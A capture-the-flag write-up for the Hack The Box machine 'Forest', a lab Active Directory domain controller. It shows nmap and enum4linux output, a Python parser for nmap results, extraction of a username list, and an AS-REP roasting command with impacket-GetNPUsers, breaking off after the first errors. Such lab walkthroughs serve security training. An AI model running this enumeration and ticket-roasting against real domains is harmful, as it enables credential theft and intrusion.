Forest [EASY🟢]
Difficulty: Easy
1- Reconnaissance and scanning
1.1 Ping
┌──(root㉿kali)-[/home/t0mz]
└─# ping -c 1 10.10.10.161
PING 10.10.10.161 (10.10.10.161) 56(84) bytes of data.
64 bytes from 10.10.10.161: icmp_seq=1 ttl=127 time=168 ms
--- 10.10.10.161 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 167.959/167.959/167.959/0.000 ms
We can tell this is a Windows machine from the TTL (the observed value of 127 is the Windows default of 128 minus one hop on the way to us):
TTL <= 64  >> Linux
TTL <= 128 >> Windows
1.2 Nmap
File: escaneo.txt
# Nmap 7.95 scan initiated Wed Mar 5 13:47:20 2025 as: /usr/lib/nmap/nmap -sC -sS -sV --min-rate 5000 -p- -open -n -Pn -vvv -oN escaneo.txt 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received user-set (0.18s latency).
Scanned at 2025-03-05 13:47:20 -03 for 90s
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-05 16:54:31Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49706/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49957/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-03-05T08:55:25-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2025-03-05T16:55:26
|_ start_date: 2025-03-05T15:39:25
|_clock-skew: mean: 2h46m49s, deviation: 4h37m09s, median: 6m48s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 57334/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Failed to receive data)
| Check 4 (port 10445/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 5 13:48:51 2025 -- 1 IP address (1 host up) scanned in 90.37 seconds
We can see we are up against a Windows Active Directory environment, specifically Windows Server 2016 Standard build 14393. The usual Active Directory ports are open: 88 (Kerberos), 135 (RPC), 139 (NetBIOS), 389 (LDAP) and 445 (SMB), and the LDAP banner already gives us the domain name, htb.local.
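Reading the scan by eye works for one box, but the same conclusions (Windows from the TTL, a domain controller from the Kerberos/LDAP/SMB trio, the domain name from the LDAP banner) can be pulled out of the -oN file programmatically, which is how you would inventory many hosts. The following Python is an added example written for this page, not the writeup's own tooling; the sample text is constructed from a few rows of the scan above (including the row the terminal wrapped mid-word), the DC_PORTS heuristic and all function names are my own choices, and the TTL defaults are the usual 64/128/255 from the table in 1.1.

```python
import re
from typing import List, NamedTuple, Optional, Tuple


class Service(NamedTuple):
    port: int
    proto: str
    state: str
    name: str
    ttl: Optional[int]   # taken from the REASON column ("syn-ack ttl 127") when present
    version: str


# One row of the port table: "389/tcp open ldap <rest>". When the header has a
# REASON column (-vvv or --reason), <rest> starts with the reason, which may carry
# a "ttl N" suffix; otherwise <rest> is the VERSION text directly.
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<name>\S+)\s*(?P<rest>.*)$")
REASON_RE = re.compile(r"^\S+(?:\s+ttl\s+(?P<ttl>\d+))?\s*")

# Prefixes of the lines Nmap itself prints around the port table. Any other
# non-blank line that follows a port row is a row the terminal wrapped.
NMAP_PREFIXES = ("#", "|", "Nmap ", "Host ", "PORT ", "Not shown", "Scanned at",
                 "Service Info", "Read data", "Service detection", "Warning")

# Default initial TTLs most stacks use; observed TTL = default minus hops traversed.
DEFAULT_TTLS: Tuple[Tuple[int, str], ...] = ((64, "Linux/Unix"), (128, "Windows"), (255, "Network device/Solaris"))

# Kerberos + LDAP + SMB open on one host is the domain-controller signature (heuristic, my assumption).
DC_PORTS = {88, 389, 445}
DOMAIN_RE = re.compile(r"Domain:\s*([A-Za-z0-9.-]+)")

# Constructed sample: a handful of rows copied from the scan above.
SAMPLE_NMAP = """\
# Nmap 7.95 scan initiated Wed Mar 5 13:47:20 2025 as: nmap -sC -sS -sV -p- -vvv -oN escaneo.txt 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received user-set (0.18s latency).
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-05 16:54:31Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Defau
lt-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
636/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
"""


def parse_nmap_normal(text: str) -> List[Service]:
    """Parse Nmap normal (-oN) output into Service rows, re-joining wrapped rows."""
    services: List[Service] = []
    has_reason = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if line.startswith("PORT "):
            has_reason = "REASON" in line
            continue
        m = PORT_RE.match(line)
        if m:
            rest, ttl = m.group("rest"), None
            if has_reason:
                r = REASON_RE.match(rest)
                if r:
                    ttl = int(r.group("ttl")) if r.group("ttl") else None
                    rest = rest[r.end():]
            services.append(Service(int(m.group("port")), m.group("proto"), m.group("state"),
                                    m.group("name"), ttl, rest.strip()))
        elif services and not line.startswith(NMAP_PREFIXES):
            # The terminal wrapped mid-word, so glue the fragment on without adding a space.
            last = services[-1]
            services[-1] = last._replace(version=last.version + line.strip())
    return services


def os_family_from_ttl(ttl: int) -> Tuple[str, int]:
    """Nearest default TTL at or above the observed one, plus the hop count it implies."""
    for default, family in DEFAULT_TTLS:
        if ttl <= default:
            return family, default - ttl
    raise ValueError(f"{ttl} is not a valid IPv4 TTL")


def is_domain_controller(services: List[Service]) -> bool:
    open_tcp = {s.port for s in services if s.proto == "tcp" and s.state == "open"}
    return DC_PORTS <= open_tcp


def extract_domain(services: List[Service]) -> Optional[str]:
    for s in services:
        m = DOMAIN_RE.search(s.version)
        if m:
            return m.group(1)
    return None


def summarize(text: str) -> dict:
    services = parse_nmap_normal(text)
    ttls = {s.ttl for s in services if s.ttl is not None}
    family, hops = os_family_from_ttl(max(ttls)) if ttls else (None, None)
    return {"ports": [s.port for s in services], "domain": extract_domain(services),
            "domain_controller": is_domain_controller(services), "os_family": family, "hops": hops}


if __name__ == "__main__":
    print(summarize(SAMPLE_NMAP))
```

The parser keys off the header line, so it handles both the REASON-column layout used above (-vvv) and the plain PORT/STATE/SERVICE/VERSION layout; the wrapped-row join is what recovers "Default-First-Site-Name" from the two fragments.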
1.3 enum4linux
enum4linux 10.10.10.161
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# enum4linux 10.10.10.161
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 6 12:24:46 2025
=========================================( Target Information )=========================================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.161 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.161 )================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161
===================================( Session Check on 10.10.10.161 )===================================
[+] Server 10.10.10.161 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.161 )================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.10.161 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.10.161 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.10.161 )=======================================
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=================================( Share Enumeration on 10.10.10.161 )=================================
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.161
============================( Password Policy Information for 10.10.10.161 )============================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=======================================( Groups on 10.10.10.161 )=======================================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Group: System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Account Operators' (RID: 548) has member: Couldn't lookup SIDs
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
==================( Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.10.161 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Mar 6 12:30:35 2025
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
2- Exploitation
2.1 User enumeration
The enum4linux tool gives us a lot of information; in the scan we see a list of users:
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
We save this list of users to a file called users:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# nvim users
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat users
File: users
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
We use regular expressions and filters to extract the clean usernames, reading from users and writing the result to users.txt (reading and redirecting to the same file in one pipeline would truncate it before cat reads it):
cat users | tr ':' ' ' | awk '{print $2}' | grep -v 'Mail' | grep -v 'SM' | grep -v '$33' | tr '[]' ' ' | tr -d ' ' > users.txt
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat users | tr ':' ' ' | awk '{print $2}' | grep -v 'Mail' | grep -v 'SM' | grep -v '$33' | tr '[]' ' ' | tr -d ' ' > users.txt
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat users.txt
File: users.txt
Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
2.2 impacket-GetNPUsers
Once we have the users, we request Kerberos tickets for them: for any account that does not require pre-authentication, the KDC answers with an AS-REP encrypted with that user's key, which gives us a hash that can be cracked offline.
For that we use the "impacket-GetNPUsers" tool with the following command:
impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161
In this command we first specify the domain, which, if we recall, Nmap had shown as "htb.local" (served on port 53); then we tell it we have no password; then the file where we stored the Active Directory users; and finally the IP of the machine.
Ejecutamos:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
